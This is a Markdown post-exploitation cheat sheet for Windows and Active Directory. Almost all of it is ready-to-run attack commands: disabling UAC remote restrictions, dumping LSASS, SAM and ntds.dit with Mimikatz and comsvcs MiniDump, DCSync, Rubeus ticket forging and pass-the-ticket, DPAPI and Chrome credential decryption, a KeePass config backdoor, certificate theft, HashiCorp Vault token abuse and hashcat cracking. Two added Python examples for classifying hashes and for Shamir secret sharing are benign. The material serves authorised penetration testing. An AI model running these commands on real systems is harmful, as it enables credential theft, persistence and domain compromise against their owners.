Post-Exploitation.md

Post-Exploitation

General

Enable SMB admin shares for local admin users (sets LocalAccountTokenFilterPolicy, which disables UAC remote restrictions)

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "LocalAccountTokenFilterPolicy" /t REG_DWORD /d 1 /f
Get-Service LanmanServer | Restart-Service -Verbose

Find credentials in files

Look for SAM files

Get-ChildItem -path C:\Windows\Repair\* -include *.SAM*,*.SYSTEM* -force -Recurse 
Get-ChildItem -path C:\Windows\System32\config\RegBack\*  -include *.SAM*,*.SYSTEM* -force -Recurse
Get-ChildItem -path C:\* -include *.SAM*,*.SYSTEM* -force -Recurse 

Check the registry for passwords

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Find autologon credentials in the registry

Get-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\WinLogon" -Name "DefaultPassword"

Look for unattend and sysprep files

Get-ChildItem -path C:\* -Recurse -Include *Unattend.xml*
Get-ChildItem -path C:\Windows\Panther\* -Recurse -Include *Unattend.xml*
Get-ChildItem -path C:\Windows\system32\* -Recurse -Include *sysprep.xml*, *sysprep.inf*
Get-ChildItem -path C:\* -Recurse -Include *Unattend.xml*, *sysprep.xml*, *sysprep.inf*

Get the PowerShell history file path and read the history

(Get-PSReadlineOption).HistorySavePath
cat <PATH>

Look for powershell history files

Get-Childitem -Path C:\Users\* -Force -Include *ConsoleHost_history* -Recurse -ErrorAction SilentlyContinue

Look for hardcoded passwords in scripts

Get-ChildItem -path C:\*  -Recurse -Include *.xml,*.ps1,*.bat,*.txt  | Select-String "password"| Export-Csv C:\Scripts\Report.csv -NoTypeInformation
Get-ChildItem -path C:\*  -Recurse -Include *.xml,*.ps1,*.bat,*.txt  | Select-String "creds"| Export-Csv C:\Scripts\Report.csv -NoTypeInformation

Check for Azure tokens

Get-ChildItem -path "C:\Users\*" -Recurse -Include *accessTokens.json*, *TokenCache.dat*, *AzureRmContext.json*

Dump password vault

[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
$vault = New-Object Windows.Security.Credentials.PasswordVault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }

Check for keytab files

Get-ChildItem C:\users\ -Recurse -include *keytab* -erroraction silentlycontinue
Get-ChildItem C:\ -Recurse -include *keytab* -erroraction silentlycontinue

Dumping LSASS

Crackmapexec

cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> --lsa
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> -M lsassy

DumpCreds

Invoke-Mimikatz -DumpCreds

Dump credentials on a local machine using Mimikatz.

Invoke-Mimikatz -Command '"sekurlsa::ekeys"' 

Using SafetyKatz (Minidump of lsass and PELoader to run Mimikatz)

SafetyKatz.exe "sekurlsa::ekeys"

Dump credentials Using SharpKatz (C# port of some of Mimikatz functionality).

SharpKatz.exe --Command ekeys

Dump credentials using Dumpert (Direct System Calls and API unhooking)

rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

Using pypykatz (Mimikatz functionality in Python)

pypykatz.exe live lsa

Use Task Manager

  • Find the lsass process in the Details tab
  • Right-click it and select "Create dump file"

Manually

Get-Process lsass
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS PROCESS ID> C:\Users\lsass.dmp full
mimikatz.exe
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonPasswords full

Dumping SAM

Crackmapexec

cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> --sam
cme smb <COMPUTERNAME> -d <DOMAIN> -u <USER> -H <NTLM HASH> -M lsassy

Mimikatz dump SAM

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'

Manually

reg save HKLM\SAM SamBkup.hiv /Y
reg save HKLM\System SystemBkup.hiv /Y
reg save HKLM\Security SecurityBkup.hiv /Y

mimikatz.exe
mimikatz # lsadump::sam SamBkup.hiv SystemBkup.hiv SecurityBkup.hiv

Dumping ntds.dit

Copy SYSTEM and ntds.dit

Copy-Item C:\Windows\system32\config\SYSTEM <PATH>
Copy-Item C:\Windows\ntds\ntds.dit <PATH>

Load DSinternals

Unblock-File DSInternals_v4.7.zip
Expand-Archive DSInternals_v4.7.zip -DestinationPath C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DSInternals

Dump with DSinternals

$key = Get-BootKey -SystemHiveFilePath <PATH TO SYSTEM>
Get-ADDBAccount -All -BootKey $key -DBPath <PATH TO ntds.dit>

Get-ADDBAccount -samaccountname administrator -BootKey $key -DBPath <PATH TO ntds.dit>

Shadowcopy

Create shadowcopy of the C:\ drive

wmic /node:<DC FQDN> /user:<USER>@<DOMAIN FQDN> /password:'<PASSWORD>' process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

Copy the NTDS.dit, SYSTEM and SECURITY hives

wmic /node:<DC FQDN> /user:<USER>@<DOMAIN FQDN> /password:'<PASSWORD>' process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\temp\"

Mount the C:\temp share of the DC as a drive

$creds = Get-Credential
New-PSDrive -Credential $creds -Name j -Root \\<DC FQDN>\c$\temp -PSProvider FileSystem

Extract credentials

python3 /opt/impacket/examples/secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit local

Hashcat

  • If the file contains usernames (<USERNAME>:<HASH> format), add --username

Crack NTLM

  • Format 5b184274dcba7bfd289e8a4f439676a4
.\hashcat.exe -a 0 -m 1000 .\hash.txt .\wordlists\rockyou.txt -r .\rules\dive.rule -w3 -O

Crack Cached credentials

  • Format $DCC2$#user#7eb833ab3bddade058de4bc672debdde
.\hashcat.exe -a 0 -m 2100 .\hash.txt .\wordlists\rockyou.txt -r .\rules\dive.rule -w3 -O

Crack NTLMv2

  • Format admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030
.\hashcat.exe -a 0 -m 5600 .\hash.txt .\wordlists\rockyou.txt -r .\rules\dive.rule -w3 -O

Mimikatz

Mimikatz dump credentials on local machine

Invoke-Mimikatz -Dumpcreds

Mimikatz dump credentials on multiple remote machines

Invoke-Mimikatz -Dumpcreds -ComputerName @("<COMPUTERNAME 1>","<COMPUTERNAME2>")

Mimikatz DCSync attack specific user

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<USER> /domain:<DOMAIN>"'

Mimikatz DCSync attack everything

Invoke-Mimikatz -Command '"lsadump::dcsync /all"'

Mimikatz dump certs

Invoke-Mimikatz -DumpCerts

Mimikatz dump vault

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "vault::cred /patch" "vault::list"'

Mimikatz dump all to find privs

Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "sekurlsa::tickets /export" "kerberos::list /export" "vault::cred /patch" "vault::list" "lsadump::sam" "lsadump::secrets" "lsadump::cache"'

Rubeus

Request TGT

  • Use /outfile:<FILE> to save the ticket to a file
  • Use /nowrap for easier copying of the ticket
  • Use /ptt to inject the ticket into the current session
.\Rubeus.exe asktgt /user:<USER> /password:<PASSWORD> /domain:<DOMAIN> /ptt
.\Rubeus.exe asktgt /user:<USER> /rc4:<HASH> /domain:<DOMAIN> /ptt

Request TGS

.\Rubeus.exe asktgs /user:<USER> /ticket:<BASE64 TGT> /service:cifs/<FQDN> /ptt
.\Rubeus.exe asktgs /user:<USER> /ticket:<TGT FILE KIRBI> /service:cifs/<FQDN> /ptt

Dump tickets

.\Rubeus.exe triage
.\Rubeus.exe dump /luid:<ID> /service:<SERVICE> /nowrap

Save ticket to file

[System.IO.File]::WriteAllBytes("C:\Users\public\ticket.kirbi", [System.Convert]::FromBase64String("<TICKET STRING>"))

Get info on ticket

.\Rubeus.exe describe /ticket:<TICKET FILE>

Load Ticket into memory

.\Rubeus.exe ptt /ticket:<TICKET BASE64>
.\Rubeus.exe ptt /ticket:<PATH TO KIRBI FILE>

Calc hash

.\Rubeus.exe hash /password:<PASSWORD> /user:<USER> /domain:<DOMAIN>

S4U2self

  • Gain access to a domain computer if we have its RC4 or AES256 key, or a TGT for its machine account.
  • There are ways of obtaining a TGT for a computer without already having local admin access to it, such as pairing the Printer Bug with a machine that has unconstrained delegation, NTLM relaying scenarios and Active Directory Certificate Services abuse.

Dump TGT

.\Rubeus.exe triage
.\Rubeus.exe dump /luid:<LUID> /service:krbtgt

Check for user to impersonate

Get-DomainUser | ? {!($_.memberof -Match "Protected Users")} | select samaccountname, memberof

Request TGS

  • Impersonate any user except members of "Protected Users" or accounts with the "This account is sensitive and cannot be delegated" flag set.
  • Make sure the impersonated user is local admin on the target machine.
.\Rubeus.exe s4u /impersonateuser:<USER> /self /altservice:cifs/<COMPUTER FQDN> /user:<COMPUTERNAME>$ /ticket:<TGT TICKET> /nowrap

Load the ticket

.\Rubeus.exe ptt /ticket:<TICKET BASE64>
.\Rubeus.exe ptt /ticket:<PATH TO KIRBI FILE>

Execute ls on the computer

ls \\<COMPUTER FQDN>\C$

Certipy

Remove the password from a PFX file for Certipy authentication

certipy cert -export -pfx "cert.pfx" -password "<PASSWORD>" -out "cert-unprotected.pfx"

Auth with certipy

  • Outputs the NTLM hash and a .ccache file, either of which can be used for authentication
certipy auth -pfx "cert-unprotected.pfx" -dc-ip <DC IP>

Token manipulation

List all tokens on a machine

Invoke-TokenManipulation -ShowAll

List all unique, usable tokens on the machine

Invoke-TokenManipulation -Enumerate

Start a new process with token of a specific user

Invoke-TokenManipulation -ImpersonateUser -Username "domain\user"

Start a new process with the token of another process

Invoke-TokenManipulation -CreateProcess "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -ProcessId 500

Get the Wi-Fi password

Get saved Wi-Fi networks

netsh wlan show profiles

Get the key of a saved Wi-Fi network

netsh wlan show profiles name=<NAME> key=clear

DPAPI

Enumerate the user's vault

vaultcmd /list
vaultcmd /listcreds:"Windows Credentials" /all
vaultcmd /listcreds:"Web Credentials" /all

./Seatbelt.exe WindowsVault

./Seatbelt.exe WindowsCredentialFiles

DonPAPI

Read creds using a credz.txt file

python3 DonPAPI.py -credz credz.txt <DOMAIN>/<USER>:<PASSWORD>@<IP>

Retrieve backup key with DA

python3 dpapi.py backupkeys --export -t <DOMAIN>/<USER>:<PASSWORD>@<IP>

Read all creds with backup key

python3 DonPAPI.py -pvk domain_backupkey.pvk <DOMAIN>/<USER>:<PASSWORD>@<IP>

Credential manager

List vault of the current user

Invoke-Mimikatz -Command '"vault::list"'

Check for blobs for user

  • Blobs can be under either Roaming or Local; check both for all commands below
ls C:\Users\<USER>\AppData\Local\Microsoft\Credentials -Hidden
ls C:\Users\<USER>\AppData\Roaming\Microsoft\Credentials -Hidden

./Seatbelt.exe WindowsCredentialFiles

Find master encryption key ID

  • The pbData field contains the encrypted data and the guidMasterKey contains the GUID of the key needed to decrypt it.
Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Users\<USER>\AppData\Local\Microsoft\Credentials\<BLOB ID>"'
ls C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<USER SID> -Hidden

Get master encryption key

Invoke-Mimikatz -Command '"dpapi::masterkey /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<USER SID>\<ID> /rpc"'

Get master encryption keys from memory

  • If the master key was not used recently it won't be in memory
Invoke-Mimikatz -Command '"sekurlsa::dpapi"'

Get MasterKey with User's Password

Invoke-Mimikatz -Command '"dpapi::masterkey /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<USER SID>\<ID> /sid:<USER SID> /password:<PASSWORD> /protected"'

Decrypt credential

Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Users\<USER>\AppData\Roaming\Microsoft\Credentials\<ID> /masterkey:<MASTERKEY>"'

Scheduled tasks

Dump with Mimikatz

  • OPSEC: touches LSASS!
Invoke-Mimikatz -Command '"dpapi::cred /patch"'

Check for blobs

ls C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

Find master encryption key ID

  • The pbData field contains the encrypted data and the guidMasterKey contains the GUID of the key needed to decrypt it.
Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<ID>"'

Dump cached keys

mimikatz !sekurlsa::dpapi

Decrypt it

Invoke-Mimikatz -Command '"dpapi::cred /in:C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials\<ID> /masterkey:<MASTERKEY>"'

Chrome

List SQLite databases

  • A non-empty Login Data file is a good indication that credentials are saved here
ls "$env:LOCALAPPDATA\google\chrome\USERDA~1\default\"

ls "C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default"

Decrypt data

.\SharpChromium.exe logins

Decrypt Cookies

dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" /unprotect
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies" /masterkey:<KEY>

KeePass

Enumeration

type %APPDATA%\KeePass\KeePass.config.xml
tasklist | findstr /I keepass
dir /s C:\ | findstr /I "KeePass"
Get-Process keepass

Dump KeePass Masterkey

Get-KeePassDatabaseKey -Verbose

Create backdoor in config

Find-KeePassConfig -Path $env:appdata\KeePass
Get-KeePassConfigTrigger -Path $env:appdata\KeePass\KeePass.config.xml -Verbose
Add-KeePassConfigTrigger -Path $env:appdata\KeePass\KeePass.config.xml -Verbose -ExportPath C:\users\public\

Guess master password

  • Remove the username prefix that keepass2john writes before the hash
keepass2john Passwords.kdbx > hash.txt
hashcat -m 13400 -a 0 hash.txt rockyou.txt -r dive.rule
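Added example, written here and not part of the original page: a small Python check that recognises the four hash formats this page cracks (NTLM, DCC2 and NTLMv2 in the Hashcat section, keepass2john output here), maps each line to its hashcat mode, strips the name prefix keepass2john writes, flags a file that mixes formats and reports whether --username is needed. Sample lines are the page's own format samples plus a constructed KeePass placeholder.

```python
import re

# Added example, not from the original page: classify hash lines by the hashcat
# modes this page uses (1000 NTLM, 2100 DCC2, 5600 NTLMv2, 13400 KeePass) and
# sanity-check a hash file before a cracking run. Sample lines are the page's
# format notes or constructed placeholders, not real credentials.

HEX = "[0-9a-fA-F]"
PATTERNS = {
    # 1000 NTLM: bare 32 hex chars; the "user:hash" form needs hashcat --username
    1000: re.compile(rf"^(?:(?P<user>[^:]+):)?(?P<hash>{HEX}{{32}})$"),
    # 2100 DCC2: $DCC2$<iterations>#<user>#<32 hex>. hashcat's form carries the
    # iteration count (10240 by default); the page's sample omits it, so allow both.
    2100: re.compile(rf"^\$DCC2\$(?P<iter>\d*)#(?P<user>[^#]+)#(?P<hash>{HEX}{{32}})$"),
    # 5600 NTLMv2: user::domain:server challenge(16 hex):NTProofStr(32 hex):blob(hex)
    5600: re.compile(rf"^(?P<user>[^:]+)::(?P<domain>[^:]*):(?P<chal>{HEX}{{16}}):"
                     rf"(?P<proof>{HEX}{{32}}):(?P<blob>{HEX}+)$"),
    # 13400 KeePass: keepass2john prefixes "<dbname>:", which hashcat does not accept
    13400: re.compile(r"^(?:(?P<user>[^:$]+):)?(?P<hash>\$keepass\$\*[12]\*.+)$"),
}


def classify(line):
    """Return (mode, fields) for one hash line, or (None, {}) if unrecognised."""
    line = line.strip()
    for mode, pat in PATTERNS.items():
        m = pat.match(line)
        if m:
            return mode, m.groupdict()
    return None, {}


def check_hashfile(lines):
    """Validate a hash file for a single hashcat run.

    Returns mode (int, or None on error), username (True when --username is
    needed), cleaned (lines as hashcat expects them) and errors. hashcat
    rejects lines that do not parse for the chosen mode, and a file mixing
    formats has to be split into one file per mode.
    """
    modes, cleaned, errors, username = set(), [], [], False
    for no, raw in enumerate(lines, 1):
        if not raw.strip():
            continue
        mode, f = classify(raw)
        if mode is None:
            errors.append((no, "unrecognised format"))
            continue
        modes.add(mode)
        if mode == 13400:
            cleaned.append(f["hash"])        # drop the "dbname:" prefix
        else:
            cleaned.append(raw.strip())
            username = username or (mode == 1000 and f["user"] is not None)
    if len(modes) > 1:
        errors.append((0, f"mixed formats {sorted(modes)}: split into one file per mode"))
    return {"mode": modes.pop() if len(modes) == 1 else None,
            "username": username, "cleaned": cleaned, "errors": errors}


# The page's three format samples plus a constructed keepass2john-style line.
SAMPLES = [
    "5b184274dcba7bfd289e8a4f439676a4",
    "$DCC2$#user#7eb833ab3bddade058de4bc672debdde",
    "admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:"
    "5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030",
    "Passwords:$keepass$*2*6000*0*aa*bb*cc*dd*ee",     # constructed placeholder
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(classify(s)[0], s[:40])
    print(check_hashfile(SAMPLES)["errors"])
```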

PuTTY .ppk file

sudo apt install putty-tools
puttygen privkey.ppk -O private-openssh -o priv_key
proxychains ssh -i priv_key <USER>@<IP>

Network Sniffing

netsh

Start netsh packet capture

netsh trace start capture=yes

Stop packet capture

netsh trace stop

Convert the .etl file to a pcapng file

.\etl2pcapng.exe NetTrace.etl capture.pcapng

Open the pcap in your preferred tool, such as Wireshark, to analyze it

Virtual Machines

Check for virtual disks on the system

Get-Childitem -Path C:\Users\* -Include *.vhdx, *.vhd, *.vmdk, *.OVF, *.OVA, *.VDI -Recurse -ErrorAction SilentlyContinue
Get-Childitem -Path C:\ -Include *.vhdx, *.vhd, *.vmdk, *.OVF, *.OVA, *.VDI -Recurse -ErrorAction SilentlyContinue

Hyper-V cmdlets

List VMs

Get-VM

Stop VM

Stop-VM -Name <VM NAME>

Get the VHDX location of VM

Get-VM -VMName <VM NAME> | Select-object VMId | Get-VHD
Get-VM -VMName <VM NAME> | Select-object VMId | Get-VHD | Select-Object Path

Mount the VHDX

Mount-VHD -Path "<PATH TO VHDX>" -PassThru
Get-Disk | Get-Partition | Get-Volume

Copy sensitive files and extract credentials

  • Example for SAM or ntds.dit; the mounted disk is D:\ here.
copy-item D:\Windows\system32\config\SAM C:\users\public\
copy-item D:\Windows\system32\config\SECURITY C:\users\public\
copy-item D:\Windows\system32\config\SYSTEM C:\users\public\
copy-item D:\Windows\ntds\ntds.dit C:\users\public\

Unmount disk

Dismount-VHD -Path "<PATH TO VHDX>"

Start the VM

Start-VM -Name <VM NAME>

Resetting a password remotely

smbpasswd

smbpasswd.py <DOMAIN>/<USER>:<PASSWORD>@<DC> -newpass '<NEW PASSWORD>'

Remote Desktop Protocol

  • Requires RDP without NLA enforced

Look for RDP without NLA

cme rdp <IP RANGE>

Reset password

  • Log in; Windows will prompt to reset the password
rdesktop <IP>

ChangePwd

Run as a valid user

runas /netonly /user:<DOMAIN>\<USER> powershell.exe

ChangePwd

.\changepw.exe /d:<DOMAIN> /u:<USER> /o:<PASSWORD OLD> /p:<PASSWORD NEW>

Active Directory Certificate Services

THEFT1 Windows certificate store

List certificates

# Current user store
certutil -user -store My

# Machine store
certutil -store My

# Current user store
.\CertifyKit.exe list

# Machine store
.\CertifyKit.exe list /storename:my /storelocation:localmachine

# User store
Get-ChildItem Cert:\CurrentUser\My -Recurse
Get-ChildItem Cert:\CurrentUser\ -Recurse

# Machine store
Get-ChildItem Cert:\LocalMachine\My -Recurse
Get-ChildItem Cert:\LocalMachine\ -Recurse

Export certificates

certutil -p <PASSWORD> -exportpfx <SERIAL ID> cert.pfx

  • Use /base64 to write the certificate as a base64-encoded file
.\CertifyKit.exe list /certificate:<SERIAL ID> /outfile:cert.pfx
.\CertifyKit.exe list /storename:my /storelocation:localmachine /certificate:<SERIAL ID> /outfile:cert.pfx

$mypwd = ConvertTo-SecureString -String "<PASSWORD>" -Force -AsPlainText
Export-PfxCertificate -Cert Cert:\LocalMachine\My\<SERIAL ID> -FilePath cert.pfx -Password $mypwd

  • If CAPI or CNG is configured to block private key export (non-exportable certificates), use Mimikatz to patch the API and export the private keys
.\Mimikatz.exe "crypto::capi" "privilege::debug" "crypto::certificates /systemstore:local_machine /store:my /export" "exit"

.\BetterSafetyKatz.exe -args "crypto::capi" "privilege::debug" "crypto::certificates /systemstore:local_machine /store:my /export" "exit"

THEFT2 Get User Certificate DPAPI

  • User certificates are stored in:
    • Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates
    • Disk: %APPDATA%\Microsoft\SystemCertificates\My\Certificates
  • User private keys:
    • CAPI keys: %APPDATA%\Microsoft\Crypto\RSA\<USER SID>
    • CNG keys: %APPDATA%\Microsoft\Crypto\Keys\

SharpDPAPI find certificates

.\SharpDPAPI.exe certificates

SharpDPAPI Dump certificates using password

  • Also usable from a session running as the user
.\SharpDPAPI.exe certificates /password:<PASSWORD>

Mimikatz Dump in users context

dpapi::masterkey /in:"<PATH TO KEY>" /rpc

Mimikatz Dump using the password

dpapi::masterkey /in:"<PATH TO KEY>" /sid:<USER SID> /password:<PASSWORD>

SharpDPAPI decrypt masterkeys using domain backup key

.\SharpDPAPI.exe certificates /pvk:<KEY>

Convert PEM to PFX with OpenSSL

  • Save the private key and certificate together in cert.pem first
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Request TGT

  • Add /getcredentials to also retrieve the NTLM hash
.\Rubeus.exe asktgt /user:<USER> /certificate:<PATH TO cert.pfx> /password:<PASSWORD> /domain:<FQDN DOMAIN> /dc:<FQDN DC> /nowrap /ptt

Check access

dir \\<FQDN DC>\c$

THEFT3 Machine Certificate DPAPI

SharpDPAPI Dump machine certificates

.\SharpDPAPI.exe certificates /machine

Mimikatz Dump machine certificates

lsadump::secrets
crypto::certificates /export /systemstore:LOCAL_MACHINE

THEFT4 Certificates on disk

Locate certificates and private key on disk

dir C:\*.pfx C:\*.pem C:\*.p12 C:\*.crt C:\*.cer C:\*.p7b C:\*.ovpn /s /b

Get-ChildItem C:\ -include ('*.pem', '*.pfx', '*.p12', '*.crt', '*.cer', '*.key', '*.ovpn') -recurse -erroraction 'silentlycontinue'

Seatbelt

.\Seatbelt.exe --group=InterestingFiles

Parse certificate

certutil -dump -v <PATH TO CERT>

Locate OpenVPN files

dir C:\*.ovpn /s /b

Get-ChildItem C:\ -include ('*.ovpn') -recurse -erroraction 'silentlycontinue'

HashiCorp

  • HashiCorp Vault can be used to store secrets such as certificates: https://www.vaultproject.io/
  • Vault uses a technique called key sharing to split the master encryption key into multiple parts (minimum 2), known as unseal keys. All keys are required to unlock the vault.
  • Once logged in, Vault issues an access token that is subject to token policies. Vault policies enforce ACLs that determine which users can view, modify or update content in the vault.
  • Even with root access to the machine hosting Vault, the only way to access its contents is through a valid token obtained via a valid authentication method (ldap, userpass, token, etc.).
  • When authentication is done with the Vault CLI, a .vault-token file is written to the home directory of the current user. If the token file of a highly privileged vault user is compromised, it can be used to escalate privileges.
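Added example (not Vault's code): Shamir secret sharing in Python to show the key-sharing idea behind unseal keys, with a mock that accepts shares one at a time the way repeated `vault operator unseal` calls do. With the threshold equal to the number of shares every share is required, as the note above says; Vault's default is 5 shares with a threshold of 3, and Vault splits the key byte-wise over GF(2^8) rather than the prime field used here.

```python
import secrets

# Added example, not Vault's own code: the key-sharing scheme behind Vault's
# unseal keys, shown as Shamir secret sharing over a prime field. Vault splits
# the master key byte-wise over GF(2^8); this prime-field version shows the same
# threshold property with less code. Assumption: the secret is an integer below P.

P = 2**521 - 1      # Mersenne prime; comfortably larger than a 256-bit key


def _poly(coeffs, x):
    """Evaluate a polynomial (coeffs[0] is the constant term) at x, mod P."""
    acc = 0
    for c in reversed(coeffs):
        acc = (acc * x + c) % P
    return acc


def split_secret(secret, shares, threshold):
    """Split `secret` into `shares` (x, y) points; any `threshold` recover it."""
    if not 1 <= threshold <= shares:
        raise ValueError("need 1 <= threshold <= shares")
    if not 0 <= secret < P:
        raise ValueError("secret must be an integer in [0, P)")
    # Random polynomial of degree threshold-1 with the secret as constant term.
    coeffs = [secret] + [secrets.randbelow(P) for _ in range(threshold - 1)]
    return [(x, _poly(coeffs, x)) for x in range(1, shares + 1)]


def combine_shares(points):
    """Lagrange-interpolate the polynomial at x = 0 to recover the secret."""
    secret = 0
    for i, (xi, yi) in enumerate(points):
        num, den = 1, 1
        for j, (xj, _) in enumerate(points):
            if i != j:
                num = num * (-xj) % P
                den = den * (xi - xj) % P
        secret = (secret + yi * num * pow(den, P - 2, P)) % P
    return secret


class SealedVault:
    """Mimics `vault operator unseal`: one share per call until the threshold is
    met, then the master key is reconstructed. Fewer than `threshold` distinct
    shares reveal nothing about the key."""

    def __init__(self, threshold):
        self.threshold = threshold
        self.pending = []
        self.key = None

    def unseal(self, share):
        """Return True once unsealed. A wrong share among the first `threshold`
        yields a wrong key; real Vault verifies the reconstructed key."""
        if self.key is None and share not in self.pending:
            self.pending.append(share)
            if len(self.pending) >= self.threshold:
                self.key = combine_shares(self.pending)
        return self.key is not None


if __name__ == "__main__":
    master = secrets.randbits(256)            # stand-in for the master key
    parts = split_secret(master, 5, 3)        # Vault's default: 5 shares, threshold 3
    v = SealedVault(3)
    for s in parts[:3]:
        print("unsealed:", v.unseal(s))
    print("recovered:", v.key == master)
```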

Scan for vault

sudo nmap -p 8200 <RANGE> -sV -sC -Pn -n

Get vault status

vault status -address=https://<IP>:8200

Find vault tokens

Get-ChildItem C:\Users\ -Recurse -Include '.vault-token' -Force

find / -name '.vault-token'

cat /root/.vault-token

Authenticate with vault token

vault login -address=https://<IP>:8200 -method=token <TOKEN>

Authenticate over LDAP

vault login -address=https://<IP>:8200 -method=ldap username=<USERNAME>

Unseal vault

  • Run multiple times for multiple keys
vault operator unseal -address=https://<IP>:8200

List all vault secrets and folders

vault secrets list -address=https://<IP>:8200

List kv secrets of folder

vault kv list -address=https://<IP>:8200 <FOLDER>

Retrieve secret

vault kv get -address=https://<IP>:8200 <FOLDER>/<SECRET>

Enumerate roles of folder

  • Check allowed_extensions, allowed_users and default_user
vault list -address=https://<IP>:8200 <FOLDER>/roles
vault read -address=https://<IP>:8200 <FOLDER>/roles/<ROLE>

Abuse signed ssh certs

Sign SSH key

  • Use the public key of a user
  • Save signed public key
vault write -address=https://<IP>:8200 -field=signed_key ssh-client-signer/sign/<ROLE> public_key=@'<PATH TO PUBLIC KEY>'

SSH with signed key

ssh -i <PATH TO SIGNED PUBLIC KEY> -i <PATH TO PRIVATE KEY> <USER>@<TARGET>

Certificates from Linux

  • Linux uses /etc/ssl directories or flat NSS SQLite database files to store certificates.
  • On Linux, certutil and pk12util are two tools that can be used to manage private keys and certificates using NSS databases and NSS tokens.

Find certs in /etc/ssl

ls -lsaR /etc/ssl

NSS databases

  • We can use certutil to view and initialize a NSS database for certificate storage.

Initialize DB

certutil -d $HOME/.pki/nssdb -N

Import Certificate

pk12util -i internaluser.p12 -d $HOME/.pki/nssdb

Enumerate DB

certutil -L -d <PATH TO nssdb>

Enumerate cert DB

certutil -L -d <PATH TO nssdb> -a -n "<CERT NICKNAME>"

Enumerate key DB

certutil -K -d <PATH TO nssdb>

Export cert and private key

pk12util -o certandkey.pfx -n "<CERT NICKNAME>" -d <PATH TO nssdb>

Check PFX

certutil -v -dump -p <PASSWORD> <PATH TO PFX>

Request TGT

.\Rubeus.exe asktgt /user:<USER> /certificate:certandkey.pfx /domain:<DOMAIN> /ptt

THEFT5 UnPAC the hash

Pass the certificate Request TGT

  • Add /getcredentials to also retrieve the NTLM hash (UnPAC the hash attack)
  • /certificate: also accepts the base64-encoded certificate instead of a file path
.\Rubeus.exe asktgt /user:<USER> /certificate:<PATH TO cert.pfx> /password:<PASSWORD> /domain:<FQDN DOMAIN> /dc:<FQDN DC> /nowrap /ptt
certipy auth -pfx '<PATH TO cert.pfx>'

UnPAC the hash attack

.\Rubeus.exe asktgt /getcredentials /user:<COMPUTERACCOUNT>$ /certificate:<PATH TO PFX> /password:<PASSWORD OF PFX> /domain:<FQDN DOMAIN> /dc:<FQDN DC> /show
certipy auth -pfx '<PATH TO cert.pfx>' -dc-ip <DC IP>

Encrypted File System

  • EFS can be used to encrypt files. The EFS certificate has to be imported into the current user's certificate store, and permission to modify the target file is required.
  • A recovery agent is needed to read or recover data encrypted with EFS; in a domain, the domain Administrator is a recovery agent by default.
  • Microsoft documents two ways to decrypt:
    • Retrieve the original EFS certificate used to encrypt the file and import it into the target computer's certificate store.
    • Use an EFS DRA certificate to restore an EFS-encrypted file when the original EFS certificate is lost.

Locate encrypted files

  • /h displays files with hidden or system attributes, which by default are not encrypted or decrypted.
  • /u /n finds all encrypted files on the local drive(s); with /n no updates are made.
cipher /u /n /h

Check .pfx file for EFS EKU

  • Check the EKU:
    • Encrypting File System (1.3.6.1.4.1.311.10.3.4): this certificate uses EFS to encrypt and decrypt data and is called an EFS certificate.
    • File Recovery (1.3.6.1.4.1.311.10.3.4.1): this certificate can recover all encrypted files and folders (domain or offline) regardless of who encrypted them and is called an EFS DRA (Data Recovery Agent) certificate.
certutil -v -dump -p <PASSWORD> <PATH TO PFX>

Import EFS certificate

.\CertifyKit.exe list /certificate:<PATH TO EFS .pfx> /storename:My /install

Read the encrypted file

type <FILE>

Cleanup

.\CertifyKit.exe list
.\CertifyKit.exe list /certificate:<FINGERPRINT> /storename:My /remove